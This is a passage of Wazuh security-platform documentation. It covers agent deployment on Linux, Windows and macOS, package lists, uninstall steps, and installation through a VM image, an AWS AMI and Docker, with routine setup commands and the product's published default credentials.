    # curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | gpg --no-default-keyring --keyring gnupg-ring:/usr/share/keyrings/wazuh.gpg --import && chmod 644 /usr/share/keyrings/wazuh.gpg
    
  3. Add the repository:

    # echo "deb [signed-by=/usr/share/keyrings/wazuh.gpg] https://packages.wazuh.com/5.x/apt/ stable main" | tee -a /etc/apt/sources.list.d/wazuh.list
    
  4. Update the package information:

    # apt-get update
    

Note

For Debian 7, 8, and Ubuntu 14 systems use the following commands.

# apt-get install gnupg apt-transport-https
# curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | apt-key add -
# echo "deb https://packages.wazuh.com/5.x/apt/ stable main" | tee -a /etc/apt/sources.list.d/wazuh.list
# apt-get update
Deploy a Wazuh agent

Follow these steps to deploy the Wazuh agent on your Linux endpoint.

  1. Select your package manager and run the command below. Replace the WAZUH_MANAGER value with your Wazuh manager IP address or hostname:

    # WAZUH_MANAGER="10.0.0.2" apt-get install wazuh-agent
    

    For additional deployment options such as agent name, agent group, and enrollment password, see the Deployment variables for Linux section.

    Note

    Alternatively, if you want to install an agent without registering it, omit the deployment variables. To learn more about the different registration methods, see the Wazuh agent enrollment section.

  2. Enable and start the Wazuh agent service.

    # systemctl daemon-reload
    # systemctl enable wazuh-agent
    # systemctl start wazuh-agent
    

The deployment process is now complete, and the Wazuh agent is successfully running on your Linux system.

Disable Wazuh updates

Compatibility between the Wazuh agent and the Wazuh manager is guaranteed when the Wazuh manager version is later than or equal to that of the Wazuh agent. Therefore, we recommend disabling the Wazuh repository to prevent accidental upgrades. To do so, use the following command:

# sed -i "s/^deb/#deb/" /etc/apt/sources.list.d/wazuh.list
# apt-get update

Alternatively, you can set the package state to hold. This action stops updates but you can still upgrade it manually using apt-get install.

# echo "wazuh-agent hold" | dpkg --set-selections
Deploying Wazuh agents on Windows endpoints

The Wazuh agent runs on the endpoint you want to monitor and communicates with the Wazuh manager, sending data in near real-time through an encrypted and authenticated channel. You can deploy the Wazuh agent on Windows systems ranging from Windows 7 to the latest versions, including Windows 11 and Windows Server 2022.

Note

You must have administrator privileges to perform the installation.

  1. Download the Windows installer to start the installation process.

  2. Select the installation method you want to follow: command line interface (CLI) or graphical user interface (GUI).

    1. Choose one of the command shell alternatives to deploy the Wazuh agent on your endpoint. Run the command below and replace the WAZUH_MANAGER value with your Wazuh manager IP address or hostname. Ensure the downloaded Wazuh agent installation file is in your working directory.

      • Using CMD:

        > wazuh-agent-5.0.0-1.msi /q WAZUH_MANAGER="10.0.0.2"
        
      • Using PowerShell:

        > .\wazuh-agent-5.0.0-1.msi /q WAZUH_MANAGER="10.0.0.2"
        

      For additional deployment options such as agent name, agent group, and registration password, see the Deployment variables for Windows section.

    2. Start the Wazuh agent from the GUI or by running:

      • Using CMD:

        > NET START WazuhSvc
        
      • Using PowerShell:

        > Start-Service wazuhsvc
        

      The installation process is now complete and the Wazuh agent is successfully installed and configured.

      Note

      Alternatively, if you want to install an agent without enrolling it, omit the deployment variables. To learn more about the different enrollment methods, see the Wazuh agent enrollment section.

By default, all agent files are stored in C:\Program Files (x86)\ossec-agent after the installation.

Deploying Wazuh agents on macOS endpoints

The Wazuh agent runs on the endpoint you want to monitor and communicates with the Wazuh manager, sending data in near real-time through an encrypted and authenticated channel.

Note

You need root user privileges to run all the commands described below.

  1. To start the installation process, download the Wazuh agent according to your architecture:

  2. Select the installation method you want to follow: Command line interface (CLI) or graphical user interface (GUI).

    1. To deploy the Wazuh agent on your endpoint, choose your architecture, edit the WAZUH_MANAGER variable to contain your Wazuh manager IP address or hostname, and run the following command.

      # echo "WAZUH_MANAGER='10.0.0.2'" > /tmp/wazuh_envs && sudo installer -pkg wazuh-agent-5.0.0-1.intel64.pkg -target /
      

      For additional deployment options such as agent name, agent group, and enrollment password, see the Deployment variables for macOS section.

      Note

      Alternatively, if you want to install an agent without enrolling it, omit the deployment variables. To learn more about the different enrollment methods, see the Wazuh agent enrollment section.

    2. Start the Wazuh agent to complete the installation process:

      # launchctl bootstrap system /Library/LaunchDaemons/com.wazuh.agent.plist
      

    The installation process is now complete, and the Wazuh agent is successfully deployed and running on your macOS endpoint.

By default, all agent files are stored in /Library/Ossec/ after the installation.

Packages list

This download page contains packages required for the Wazuh installation.

Wazuh indexer

Package type

Architecture

Package

RPM

x86_64

wazuh-indexer-5.0.0-1.x86_64.rpm (sha512)

aarch64

wazuh-indexer-5.0.0-1.aarch64.rpm (sha512)

DEB

amd64

wazuh-indexer_5.0.0-1_amd64.deb (sha512)

arm64

wazuh-indexer_5.0.0-1_arm64.deb (sha512)

Wazuh server
Wazuh manager

Distribution

Version

Architecture

Package

Amazon Linux

1 and later

x86_64

wazuh-manager-5.0.0-1.x86_64.rpm (sha512)

aarch64

wazuh-manager-5.0.0-1.aarch64.rpm (sha512)

CentOS

7 and later

x86_64

wazuh-manager-5.0.0-1.x86_64.rpm (sha512)

aarch64

wazuh-manager-5.0.0-1.aarch64.rpm (sha512)

Debian

8 and later

x86_64

wazuh-manager_5.0.0-1_amd64.deb (sha512)

aarch64

wazuh-manager_5.0.0-1_arm64.deb (sha512)

Fedora

22 and later

x86_64

wazuh-manager-5.0.0-1.x86_64.rpm (sha512)

aarch64

wazuh-manager-5.0.0-1.aarch64.rpm (sha512)

OpenSUSE

42 and later

x86_64

wazuh-manager-5.0.0-1.x86_64.rpm (sha512)

aarch64

wazuh-manager-5.0.0-1.aarch64.rpm (sha512)

Oracle Linux

7 and later

x86_64

wazuh-manager-5.0.0-1.x86_64.rpm (sha512)

aarch64

wazuh-manager-5.0.0-1.aarch64.rpm (sha512)

Red Hat Enterprise Linux

7 and later

x86_64

wazuh-manager-5.0.0-1.x86_64.rpm (sha512)

aarch64

wazuh-manager-5.0.0-1.aarch64.rpm (sha512)

SUSE

12

x86_64

wazuh-manager-5.0.0-1.x86_64.rpm (sha512)

aarch64

wazuh-manager-5.0.0-1.aarch64.rpm (sha512)

Ubuntu

13 and later

x86_64

wazuh-manager_5.0.0-1_amd64.deb (sha512)

aarch64

wazuh-manager_5.0.0-1_arm64.deb (sha512)

Raspbian OS

Buster and later

aarch64

wazuh-manager_5.0.0-1_arm64.deb (sha512)

Filebeat

Package type

Architecture

Package

RPM

x86_64

filebeat-7.10.2-2.x86_64.rpm (sha512)

aarch64

filebeat-7.10.2-2.aarch64.rpm (sha512)

DEB

amd64

filebeat_7.10.2-2_amd64.deb (sha512)

arm64

filebeat_7.10.2-2_arm64.deb (sha512)

Wazuh dashboard

Package type

Architecture

Package

RPM

x86_64

wazuh-dashboard-5.0.0-1.x86_64.rpm (sha512)

aarch64

wazuh-dashboard-5.0.0-1.aarch64.rpm (sha512)

DEB

amd64

wazuh-dashboard_5.0.0-1_amd64.deb (sha512)

arm64

wazuh-dashboard_5.0.0-1_arm64.deb (sha512)

Wazuh agent
Linux

Distribution

Version

Architecture

Package

AlmaLinux

10 and later

x86_64

wazuh-agent-5.0.0-1.x86_64.rpm (sha512)

aarch64

wazuh-agent-5.0.0-1.aarch64.rpm (sha512)

Amazon Linux

2

powerpc

wazuh-agent-5.0.0-1.ppc64le.rpm (sha512)

1 and later

x86_64

wazuh-agent-5.0.0-1.x86_64.rpm (sha512)

aarch64

wazuh-agent-5.0.0-1.aarch64.rpm (sha512)

CentOS

7 and later

powerpc

wazuh-agent-5.0.0-1.ppc64le.rpm (sha512)

6 and later

i386

wazuh-agent-5.0.0-1.i386.rpm (sha512)

x86_64

wazuh-agent-5.0.0-1.x86_64.rpm (sha512)

aarch64

wazuh-agent-5.0.0-1.aarch64.rpm (sha512)

armhf

wazuh-agent-5.0.0-1.armv7hl.rpm (sha512)

Debian

9 and later

powerpc

wazuh-agent_5.0.0-1_ppc64el.deb (sha512)

7 and later

i386

wazuh-agent_5.0.0-1_i386.deb (sha512)

x86_64

wazuh-agent_5.0.0-1_amd64.deb (sha512)

aarch64

wazuh-agent_5.0.0-1_arm64.deb (sha512)

armhf

wazuh-agent_5.0.0-1_armhf.deb (sha512)

Fedora

22 and later

powerpc

wazuh-agent-5.0.0-1.ppc64le.rpm (sha512)

i386

wazuh-agent-5.0.0-1.i386.rpm (sha512)

x86_64

wazuh-agent-5.0.0-1.x86_64.rpm (sha512)

aarch64

wazuh-agent-5.0.0-1.aarch64.rpm (sha512)

armhf

wazuh-agent-5.0.0-1.armv7hl.rpm (sha512)

OpenSUSE

42 and later

i386

wazuh-agent-5.0.0-1.i386.rpm (sha512)

x86_64

wazuh-agent-5.0.0-1.x86_64.rpm (sha512)

aarch64

wazuh-agent-5.0.0-1.aarch64.rpm (sha512)

armhf

wazuh-agent-5.0.0-1.armv7hl.rpm (sha512)

Oracle Linux

6 and later

i386

wazuh-agent-5.0.0-1.i386.rpm (sha512)

x86_64

wazuh-agent-5.0.0-1.x86_64.rpm (sha512)

aarch64

wazuh-agent-5.0.0-1.aarch64.rpm (sha512)

Red Hat Enterprise Linux

6 and later

i386

wazuh-agent-5.0.0-1.i386.rpm (sha512)

x86_64

wazuh-agent-5.0.0-1.x86_64.rpm (sha512)

aarch64

wazuh-agent-5.0.0-1.aarch64.rpm (sha512)

RockyLinux

10 and later

x86_64

wazuh-agent-5.0.0-1.x86_64.rpm (sha512)

aarch64

wazuh-agent-5.0.0-1.aarch64.rpm (sha512)

SUSE

12

i386

wazuh-agent-5.0.0-1.i386.rpm (sha512)

x86_64

wazuh-agent-5.0.0-1.x86_64.rpm (sha512)

aarch64

wazuh-agent-5.0.0-1.aarch64.rpm (sha512)

armhf

wazuh-agent-5.0.0-1.armv7hl.rpm (sha512)

Ubuntu

12 and later

i386

wazuh-agent_5.0.0-1_i386.deb (sha512)

x86_64

wazuh-agent_5.0.0-1_amd64.deb (sha512)

aarch64

wazuh-agent_5.0.0-1_arm64.deb (sha512)

armhf

wazuh-agent_5.0.0-1_armhf.deb (sha512)

Raspbian OS

Buster and later

aarch64

wazuh-agent_5.0.0-1_arm64.deb (sha512)

armhf

wazuh-agent_5.0.0-1_armhf.deb (sha512)

Windows

Version

Architecture

Package

Windows 7 or later

32/64bits

wazuh-agent-5.0.0-1.msi (sha512)

macOS

Architecture

Package

Intel

wazuh-agent-5.0.0-1.intel64.pkg (sha512)

Apple silicon

wazuh-agent-5.0.0-1.arm64.pkg (sha512)

Uninstalling Wazuh

This section describes how to uninstall the Wazuh central components and the Wazuh agent.

Note

You need root user privileges to run all the commands described below.

Uninstalling the Wazuh central components

Follow these steps to uninstall the Wazuh central components using the Wazuh installation assistant.

  1. Download the Wazuh installation assistant:

    # curl -sO https://packages.wazuh.com/5.0/wazuh-install.sh
    
  2. Run the Wazuh installation assistant with the option -u or --uninstall as follows:

    # bash wazuh-install.sh --uninstall
    

This will remove the Wazuh indexer, the Wazuh server, and the Wazuh dashboard.

Uninstalling Wazuh components

Choose from the options below to uninstall a Wazuh component.

Uninstalling the Wazuh dashboard

Follow the step below to uninstall the Wazuh dashboard using your package manager.

  1. Remove the Wazuh dashboard installation.

    # apt-get remove --purge wazuh-dashboard -y
    
Uninstalling the Wazuh server

Follow these steps to uninstall the Wazuh manager and filebeat using your package manager.

  1. Remove the Wazuh manager installation.

    # apt-get remove --purge wazuh-manager -y
    
  2. Remove the Filebeat installation.

    # apt-get remove --purge filebeat -y
    
Uninstalling the Wazuh indexer

Follow the step below to uninstall the Wazuh indexer using your package manager.

  1. Remove the Wazuh indexer installation.

    # apt-get remove --purge wazuh-indexer -y
    
Uninstalling the Wazuh agent

This section describes how to uninstall Wazuh agents installed across the different operating systems below:

Uninstalling a Linux Wazuh agent

Run the following commands to uninstall a Linux agent.

Note

To uninstall Wazuh agent from a Linux endpoint with the anti-tampering feature enabled, refer to Uninstalling an agent with anti-tampering enabled.

  1. Remove the Wazuh agent installation.

    # apt-get remove wazuh-agent
    

    Some files are marked as configuration files. Due to this designation, the package manager does not remove these files from the filesystem. Run the following command If you want to remove all files completely.

    # apt-get remove --purge wazuh-agent
    
  2. Disable the Wazuh agent service.

    # systemctl disable wazuh-agent
    # systemctl daemon-reload
    

The Wazuh agent is now completely removed from your Linux endpoint.

Uninstalling a Windows Wazuh agent

To uninstall the Wazuh agent, ensure the original Windows installer file is in your working directory and run the following command:

> msiexec.exe /x wazuh-agent-5.0.0-1.msi /qn

The Wazuh agent is now completely removed from your Windows endpoint.

Uninstalling a macOS Wazuh agent

Follow these steps to uninstall the Wazuh agent from your macOS endpoint.

  1. Stop the Wazuh agent service.

    # launchctl bootout system /Library/LaunchDaemons/com.wazuh.agent.plist
    
  2. Remove the /Library/Ossec/ folder.

    # /bin/rm -r /Library/Ossec
    
  3. Remove launchdaemons and StartupItems.

    # /bin/rm -f /Library/LaunchDaemons/com.wazuh.agent.plist
    # /bin/rm -rf /Library/StartupItems/WAZUH
    
  4. Remove the Wazuh user and group.

    # /usr/bin/dscl . -delete "/Users/wazuh"
    # /usr/bin/dscl . -delete "/Groups/wazuh"
    
  5. Remove from pkgutil.

    # /usr/sbin/pkgutil --forget com.wazuh.pkg.wazuh-agent
    

The Wazuh agent is now completely removed from your macOS endpoint.

Installation alternatives

You can install Wazuh using other deployment options. These are complementary to the installation methods you can find in the Installation guide and the Quickstart.

Installing the Wazuh central components

All the alternatives include instructions on how to install the Wazuh central components. After these are installed, you then need to deploy agents to your endpoints.

Ready-to-use machines

  • Virtual machine (VM): Wazuh provides a pre-built virtual machine image (OVA) that you can directly import using VirtualBox or other OVA compatible virtualization systems.

  • Amazon Machine Images (AMI): This is a pre-built Amazon Machine Image (AMI) you can directly launch on an AWS cloud instance.

Containers

  • Deployment on Docker: Docker is a set of platform-as-a-service (PaaS) products that deliver software in packages called containers. Using Docker, you can install and configure the Wazuh deployment as a single-host architecture.

  • Deployment on Kubernetes: Kubernetes is an open-source system for automating deployment, scaling, and managing containerized applications. This deployment type uses Wazuh images from Docker and allows you to build the Wazuh environment.

Offline

  • Offline installation guide: Installing the solution offline involves downloading the Wazuh components to later install them on a system with no internet connection.

From sources

  • Installing the Wazuh server from sources: Installing Wazuh from sources means installing the Wazuh manager without using a package manager. You compile the source code and copy the binaries to your computer instead.

Note

To integrate Wazuh with Elastic or Splunk, refer to our Integrations guide: Elastic, OpenSearch, Splunk, Amazon Security Lake.

Installing the Wazuh agent

The Wazuh agent is a single and lightweight monitoring software. It is a multi-platform component that can be deployed to laptops, desktops, servers, cloud instances, containers, or virtual machines. It provides visibility into the endpoint security by collecting critical system and application records, inventory data, and detecting potential anomalies.

If the Wazuh central components are already installed in your environment, select your operating system below and follow the installation steps to deploy the agent on the endpoints.

From sources

  • Installing the Wazuh agent from sources: Installing Wazuh from sources means installing the Wazuh agent without using a package manager. You compile the source code and copy the binaries to your computer instead.

Orchestration tools

These alternatives guide you to install the Wazuh central components along with the single universal agent.

  • Deployment with Ansible: Ansible is an open source platform designed for automating tasks. Its deployment tool is used to deploy the Wazuh infrastructure on AWS. The Wazuh environment consists of the Wazuh central components and a Wazuh agent.

  • Deployment with Puppet: Puppet is an open-source software tool that gives you an automatic way to inspect, deliver, operate, and future-proof all of your software, no matter where it is executed. It is very simple to use and allows you to install and configure Wazuh easily.

Virtual machine (VM)

Wazuh provides a pre-built virtual machine image in Open Virtual Appliance (OVA) format. It includes the Amazon Linux 2023 operating system and the Wazuh central components.

  • Wazuh manager 5.0.0

  • Filebeat-OSS 7.10.2

  • Wazuh indexer 5.0.0

  • Wazuh dashboard 5.0.0

You can import the Wazuh virtual machine image to VirtualBox or other OVA-compatible virtualization systems. This VM runs only on 64-bit systems with x86_64/AMD64 architecture. It does not provide high availability or scalability out of the box. However, you can implement these using distributed deployment.

Download the virtual appliance (OVA).

OS

Architecture

VM Format

Version

Package

Amazon Linux 2023

64-bit x86_64/AMD64 architecture

OVA

5.0.0

wazuh-5.0.0.ova (sha512)

Hardware requirements

The following requirements have to be in place before the Wazuh VM can be imported into a host operating system:

  • The host operating system must be 64-bit with x86_64/AMD64 architecture.

  • Enable hardware virtualization in the host firmware.

  • Install a virtualization platform, such as VirtualBox, on the host system.

The Wazuh VM is configured with these specifications by default:

Component

CPU (cores)

RAM (GB)

Storage (GB)

Wazuh v5.0.0 OVA

4

8

50

The hardware configuration can be modified depending on the number of protected endpoints and indexed alert data. For more information about requirements, see Quickstart.

Import and access the virtual machine
  1. Import the wazuh-5.0.0.ova file to your virtualization platform.

  2. If you use VirtualBox, set the Graphics Controller to VMSVGA. Other controllers can freeze the VM window.

    1. Select the imported VM

    2. Click Settings > Display

    3. Switch from Basic to Expert mode at the top-left of the settings window.

    4. From the Graphic controller dropdown, select the VMSVGA option.

  3. Start the VM.

  4. Log in using these credentials. You can use the virtualization platform or access it via SSH.

    user: wazuh-user
    password: wazuh
    

    The SSH root user login is disabled. The wazuh-user has sudo privileges. To switch to root, execute the following command:

    sudo -i
    
Access the Wazuh dashboard

After starting the VM, access the Wazuh dashboard in a web browser using these credentials:

URL: https://<WAZUH_SERVER_IP>
user: admin
password: admin

It might take a few seconds to minutes for the Wazuh dashboard to complete initialization. You can find <WAZUH_SERVER_IP> by typing the following command in the VM:

ip a
Configuration files

All components in this virtual image are configured to work out of the box. However, all components can be fully customized. These are the configuration file locations:

  • Wazuh manager: /var/ossec/etc/ossec.conf

  • Wazuh indexer: /etc/wazuh-indexer/opensearch.yml

  • Filebeat-OSS: /etc/filebeat/filebeat.yml

  • Wazuh dashboard:

    • /etc/wazuh-dashboard/opensearch_dashboards.yml

    • /usr/share/wazuh-dashboard/data/wazuh/config/wazuh.yml

VirtualBox time configuration

If you use VirtualBox, the VM might experience time skew when VirtualBox synchronizes the guest machine time. Follow the steps below to avoid this:

  1. Select the imported Wazuh VM

  2. Click on Settings > System.

  3. Switch from Basic to Expert mode at the top-left of the settings window.

  4. Click on the Motherboard sub-tab.

  5. Enable the Hardware Clock in UTC Time option under Features.

Note

By default, the network interface type is set to Bridged Adapter. The VM attempts to obtain an IP address from the network DHCP server. Alternatively, you can set a static IP address by configuring the network files in Amazon Linux.

Once the virtual machine is imported and running, the next step is to deploy the Wazuh agents on the systems to be monitored.

Troubleshooting
VM fails to start on AMD processors with VMware

Issue:

  • After importing the Wazuh OVA into VMware Workstation on a host with an AMD processor, the VM fails to start with the error:

    The guest operating system has disabled the CPU. Power off or reset the virtual machine.
    

Workaround:

  1. Locate and edit the VM .vmx file after importing the OVA.

  2. Add the following lines to the end of the file to resolve compatibility issues between the VM and AMD processors.

    cpuid.0.eax = "0000:0000:0000:0000:0000:0000:0000:1011"
    cpuid.0.ebx = "0111:0101:0110:1110:0110:0101:0100:0111"
    cpuid.0.ecx = "0110:1100:0110:0101:0111:0100:0110:1110"
    cpuid.0.edx = "0100:1001:0110:0101:0110:1110:0110:1001"
    cpuid.1.eax = "0000:0000:0000:0001:0000:0110:0111:0001"
    cpuid.1.ebx = "0000:0010:0000:0001:0000:1000:0000:0000"
    cpuid.1.ecx = "1000:0010:1001:1000:0010:0010:0000:0011"
    cpuid.1.edx = "0000:0111:1000:1011:1111:1011:1111:1111"
    featureCompat.enable = "FALSE"
    
  3. Save the file and power on the VM.

Upgrading the VM

The virtual machine can be upgraded as a traditional installation:

Amazon Machine Images (AMI)

Wazuh provides a pre-built Amazon Machine Image (AMI). An AMI is a ready-to-use template for creating virtual computing environments in Amazon Elastic Compute Cloud (Amazon EC2). The latest Wazuh AMI includes Amazon Linux 2023 and the Wazuh central components.

  • Wazuh manager 5.0.0

  • Filebeat-OSS 7.10.2

  • Wazuh indexer 5.0.0

  • Wazuh dashboard 5.0.0

Packages list

Distribution

Architecture

VM Format

Latest version

Product page

Amazon Linux 2023

64-bit

AWS AMI

5.0.0

Wazuh All-In-One Deployment

Deployment alternatives

You can deploy a Wazuh instance in two ways. Launch the Wazuh All-In-One Deployment AMI directly from the AWS Marketplace or configure and deploy an instance using the AWS Management Console.

Note

Our Wazuh Consulting Service is also available in the AWS Marketplace. Check the Professional Service packages that Wazuh has to offer.

Launch an instance from the AWS Marketplace
  1. Go to Wazuh All-In-One Deployment in the AWS Marketplace, then click View purchase options.

  2. Review the information and the terms for the software. Click Subscribe to confirm subscribing to our product. You will receive an email notification that your offer has been accepted.

  3. Click Launch your software to continue your setup.

  4. Select the service Amazon EC2, Launch from EC2 console, and a Region.

  5. Click Launch from EC2 to take you to the AWS Management Console.

  6. Review your configuration, ensuring all settings are correct, before launching the software. Adapt the default configuration to your needs.

    1. When selecting the EC2 Instance Type, we recommend c5a.xlarge because it offers an ideal balance of high compute performance and cost-efficiency.

    2. To guarantee the correct operation, the Security Group must have the appropriate settings for your Wazuh instance. You can create a new security group by choosing Create security group. This new group will have the appropriate settings by default.

  7. Click Launch to generate the instance.

Once your instance is successfully launched and a few minutes have elapsed, you can access the Wazuh dashboard.

Deploy an instance using the AWS Management Console
  1. Select EC2 from your AWS Management Console dashboard.

  2. Click Launch instance.

  3. Click on Browse more AMIs.

  4. Search Wazuh All-In-One Deployment by Wazuh Inc under the AWS Marketplace AMIs tab, and click Select. This brings up a description of the Wazuh All-In-One Deployment with the option to either Subscribe on instance launch or Subscribe now.

  5. Select the instance type that best fits your needs. We recommend c5a.xlarge.

    You can use either of these three configuration alternatives available regarding the key pair settings:

    • Choose an existing key pair

    • Create a new key pair

    • Proceed without a key pair (Not recommended)

    You need to choose an existing key pair or create a new one to access the instance with SSH.

  6. When selecting the Security Group, ensure it has the appropriate settings for your Wazuh instance to guarantee correct operation. You can create a new security group by choosing Create security group. This new group will have the appropriate settings by default. Check that the ports and protocols are the ports and protocols for Wazuh. Check the security measures for your instance. This will establish the Security Group (SG).

  7. Under the Size (GiB) column, set your instance's storage capacity, then click Next: Add Tags. We recommend 100 GiB gp3 or more.

  8. Review the instance configuration and click Launch instance.

After a few minutes, the instance will be ready. You can access the Wazuh dashboard.

Configuration files

All components included in this AMI are configured to work out-of-the-box without the need to modify any settings. However, all components can be fully customized. These are the configuration file locations:

  • Wazuh manager: /var/ossec/etc/ossec.conf

  • Wazuh indexer: /etc/wazuh-indexer/opensearch.yml

  • Filebeat-OSS: /etc/filebeat/filebeat.yml

  • Wazuh dashboard:

    • /etc/wazuh-dashboard/opensearch_dashboards.yml

    • /usr/share/wazuh-dashboard/data/wazuh/config/wazuh.yml

To learn more about configuring Wazuh, see the User manual.

Access the Wazuh dashboard

When the instance is launched, the user passwords are automatically changed to the instance ID with the first letter capitalized. For example: I-07f25f6afe4789342. This ensures that only the creator has access to the interface. This process can take an average of five minutes, depending on the type of instance. During this time, SSH access and Wazuh dashboard access are disabled.

Once the instance runs and the process to initialize passwords is complete, you can access the Wazuh dashboard with your credentials.

  • URL: https://<YOUR_INSTANCE_IP>

  • Username: admin

  • Password: <YOUR_INSTANCE_ID>

Note

The password is the instance ID with the first letter capitalized. For example, if the instance ID is: i-07f25f6afe4789342, the default password will be I-07f25f6afe4789342.

Warning

The passwords for the Wazuh server API users wazuh and wazuh-wui are the same as those for the admin user. We highly recommend changing the default passwords on the first SSH access. To perform this action, refer to the Password management section.

Security considerations about SSH
  • The root user cannot be identified by SSH, and the instance can only be accessed through the user: wazuh-user.

  • The instance can only be accessed through a key pair, which is provided to the user with the key pair.

  • You must download the key generated or stored in AWS to access the instance with a key pair. Then, run the following command to connect with the instance.

    # ssh -i "<KEY_PAIR_NAME>" wazuh-user@<YOUR_INSTANCE_IP>
    
  • Access during the initial password change is disabled to prevent potential problems. This process might take a few minutes to complete. Any access attempt before completion shows: wazuh-user@<INSTANCE_IP>: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

Next steps

The Wazuh AMI is now ready and you can proceed with deploying the Wazuh agents on the systems to be monitored.

Upgrading the AMI

Follow the instructions on how to upgrade the Wazuh central components.

Deployment on Docker

Docker is an open source platform that simplifies building, delivering, and running applications in lightweight, portable containers. These containers bundle their application with all its dependencies, such as code, system tools, system libraries, and settings. Docker enables the separation of applications from the underlying infrastructure and ensures they run consistently across any environment, whether in the cloud or on-premises.

Wazuh provides official Docker images that you can install to streamline deployment. These include:

You can find all available Wazuh Docker images on Docker Hub.

Content
Wazuh Docker deployment

Wazuh consists of a multi-platform Wazuh agent and three central components: the Wazuh server, the Wazuh indexer, and the Wazuh dashboard. Refer to the Wazuh components documentation for more information.

Deployment options

Wazuh supports the deployment of its central components and agent on Docker.

  • Single-node stack: This stack deploys one of each Wazuh central component as a separate container. It includes:

    • Wazuh indexer container: Stores and indexes security data collected by the Wazuh manager.

    • Wazuh manager container: Analyzes collected security events, applies detection rules, and manages Wazuh agents.

    • Wazuh dashboard container: Centralized web interface for monitoring, searching, and managing Wazuh.

    It provides persistent storage and configurable certificates for secure communication.

  • Multi-node stack: This stack deploys each Wazuh component as a separate container. It includes:

    • Three Wazuh indexer containers: Work together in a cluster to store and replicate indexed data, ensuring scalability and fault tolerance.

    • Two Wazuh manager containers: One master and one worker node. The master coordinates agent management and rule updates, while the worker provides redundancy and load distribution.

    • One Wazuh dashboard container.

    • One Nginx proxy container: This provides a single secure entry point that load balances traffic between multiple Wazuh manager nodes for high availability. The Nginx container acts as a reverse proxy, distributing incoming requests across the available manager nodes and providing SSL termination for secure communication.

This deployment stack provides persistent storage, secure communication, and high availability.

  • Wazuh agent: This deploys the Wazuh agent as a container on your Docker host.

Prerequisites

Before deploying Wazuh on Docker, ensure your environment meets the following requirements.

System requirements
Single-node stack deployment
  • Operating system: Linux or Windows

  • Architecture: AMD64 (x86_64) or ARM64 (AARCH64)

  • CPU: At least 4 cores

  • Memory: At least 8 GB of RAM for the Docker host

  • Disk space: At least 50 GB storage for Docker images and data volumes

Multi-node stack deployment
  • Operating system: Linux or Windows

  • Architecture: AMD64 or ARM64

  • CPU: At least 4 cores

  • Memory: At least 16 GB for the Docker host

  • Disk space: At least 100 GB storage for Docker images and data volumes

Wazuh agent deployment
  • Operating system: Linux or Windows

  • Architecture: AMD64

  • CPU: At least 2 cores

  • Memory: At least 1 GB of RAM for the Docker host

  • Disk space: At least 10 GB storage for Docker images and logs

Required software
  • Docker Engine / Docker Desktop: Use the latest stable version.

    • Linux: Docker Engine

    • Windows: Docker Desktop (requires WSL 2)

  • Docker Compose: Latest stable version (included with Docker Desktop on Windows; install separately on Linux if needed).

  • Git: For cloning the Wazuh Docker repository.

Docker host requirements

You need to configure your Docker host to run Wazuh correctly on any system that uses a Linux kernel. This includes native Linux distributions and Windows with WSL 2 (Windows Subsystem for Linux version 2).

  1. Set max_map_count to 262144 on your Docker host. The Wazuh indexer creates many virtual memory areas (VMAs), so the kernel must allow more than the Linux default limit of 65530. A VMA is a region of memory that lets applications like the Wazuh indexer access files directly from disk as if they were in RAM.

    Note

    On Windows systems using WSL 2, run this command within the WSL 2 environment.

    # sysctl -w vm.max_map_count=262144
    

    Warning

    If you don’t set vm.max_map_count to at least 262144, the Wazuh indexer might fail due to limited virtual memory mapping. This value lets the indexer map more files and index segments to memory, preventing errors or crashes.

  2. On native Linux systems, add your user to the docker group if you want to run Docker without root privileges:

    # usermod -aG docker <USER>
    

    Replace <USER> with your username. Log out and back in for the change to take effect.

Exposed ports

The following ports are exposed when the Wazuh central components are deployed.

Port

Component

1514

Wazuh TCP

1515

Wazuh TCP

514

Wazuh UDP

55000

Wazuh server API

9200

Wazuh indexer API

443

Wazuh dashboard HTTPS

Wazuh central components

Below are the steps for deploying the Wazuh central components in single-node and multi-node stacks.

Warning

Do not run the single-node and multi-node stacks at the same time on the same Docker host. Both stacks use overlapping resources (such as container names, ports, and volumes), which can lead to conflicts, unexpected behavior, or data corruption.

Single-node stack deployment

Follow the steps below to deploy the Wazuh central components in a single-node stack.

Note

All deployment commands provided apply to both Windows and Linux environments.

Cloning the repository
  1. Clone the Wazuh Docker repository to your system:

    # git clone https://github.com/wazuh/wazuh-docker.git -b v5.0.0
    
  2. Navigate to the single-node directory to execute all the following commands.

    # cd wazuh-docker/single-node/
    
Certificate generation

You must provide certificates for each node to secure communication between them in the Wazuh stack. You have two alternatives:

  • Wazuh self-signed certificates

  • Your own certificates

You must use the wazuh-certs-generator Docker image to generate self-signed certificates for each node of the stack.

  1. Optional: Add the following to the generate-indexer-certs.yml file if your system uses a proxy. If not, skip this step. Replace <YOUR_PROXY_ADDRESS_OR_DNS> with your proxy information.

    # Wazuh App Copyright (C) 2017, Wazuh Inc. (License GPLv2)
    services:
      generator:
        image: wazuh/wazuh-certs-generator:0.0.4
        hostname: wazuh-certs-generator
        volumes:
          - ./config/wazuh_indexer_ssl_certs/:/certificates/
          - ./config/certs.yml:/config/certs.yml
        environment:
          - HTTP_PROXY=<YOUR_PROXY_ADDRESS_OR_DNS>
    
  2. Run the following command to generate the desired certificates:

    # docker compose -f generate-indexer-certs.yml run --rm generator
    

The generated certificates will be stored in the wazuh-docker/single-node/config/wazuh_indexer_ssl_certs directory.

Deployment
  1. Start the Wazuh Docker deployment using the docker compose command:

    # docker compose up -d
    

Note

Docker does not dynamically reload the configuration. After changing a component's configuration, you need to restart the stack.

Accessing the Wazuh dashboard

After deploying the single-node stack, you can access the Wazuh dashboard using your Docker host's IP address or localhost.

https://<DOCKER_HOST_IP>

Note

If you use a self-signed certificate, your browser will display a warning that it cannot verify the certificate's authenticity.

This is the default username and password to access the Wazuh dashboard:

  • Username: admin

  • Password: SecretPassword

Refer to the changing the default password of Wazuh users section to learn more about additional security.

Note

To determine when the Wazuh indexer is up, the Wazuh dashboard container uses curl to repeatedly send queries to the Wazuh indexer API (port 9200). You can expect to see several Failed to connect to Wazuh indexer port 9200 log messages or Wazuh dashboard server is not ready yet until the Wazuh indexer is started. Then the setup process continues normally. It takes about one minute for the Wazuh indexer to start up. You can find the default Wazuh indexer credentials in the docker-compose.yml file.

Multi-node stack deployment

Follow the steps below to deploy the Wazuh central components in a multi-node stack.

Note

All deployment commands provided apply to both Windows and Linux environments.

Cloning the repository
